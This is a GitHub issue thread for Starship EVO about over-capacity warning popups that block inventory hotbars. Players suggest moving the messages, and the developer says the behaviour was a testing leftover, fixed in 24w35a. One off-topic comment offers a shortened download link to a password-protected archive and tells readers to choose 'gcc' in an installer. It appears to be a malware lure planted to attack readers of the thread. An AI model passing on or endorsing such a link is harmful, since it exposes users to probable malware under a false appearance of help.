### ISSUE TITLE
[Survival feedback] Overweight message blocks inventory UI

### ISSUE THREAD

**Issue by Asnro** [tsunamayo/Starship-EVO#5953]
### Short Description of the issue:

If you pick up too many items in Survival, the warning message for being over capacity pops up incessantly. It's far tooo frequent and blocks 2/3 hotbars when accessing any inventories, which actively hinders the player from transferring inventory and solving the problem.

### Steps to reproduce the issue:

Pick up too many items then access an inventory to try dump the items. If the items are on 1st or 2nd bar the popup message will block the items.

### Environment
- Starship EVO version: 24w34b
- Graphics Card: RTX 4090

### Additional information:

![kuva](https://github.com/user-attachments/assets/86b8ef0c-70c3-4390-84c5-c1214cc3588c)

Please also include the `Player.log` file. You can find the log file here: `%UserProfile%\AppData\LocalLow\Moonfire Entertainment\Starship EVO\`

If you issue concerns a particular design please include any blueprint that could help to reproduce the issue.
Blueprint folder is over at:
`%UserProfile%\AppData\LocalLow\Moonfire Entertainment\Starship EVO\Save_Data\Blueprints\`
You will need to zip the folder to upload it. 
To do so Right click and choose [Send to -> compressed zip file] then drag the .zip onto your report to upload it.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ProPeach** [comment]
The location of these type of messages is quite annoying yeah, primarily the way it covers the hotbar. Could they be moved down below the hotbar so it doesn't cover the items on it?
There's no reason for those duplicate messages too as seen in the screenshot, they both say the same message. If those could be reduced too that'd be awesome

**Comment by BigBadKangaroo** [comment]
> The location of these type of messages is quite annoying yeah, primarily the way it covers the hotbar. Could they be moved down below the hotbar so it doesn't cover the items on it? There's no reason for those duplicate messages too as seen in the screenshot, they both say the same message. If those could be reduced too that'd be awesome

I think putting these type of messages in the top right/ left corner of the screen would be more reasonable. Maybe even above the whole player UI with the O2 and inventory capacity. That way the player will see them but doesn't get any type of blocked UI.

**Comment by tsunamayo** [comment]
Yeah sorry they are supposed to popup only once every minute, so no overlay issue. I put it this way for testing and forgot to put it back. Fixed for 24w35a. Cheers
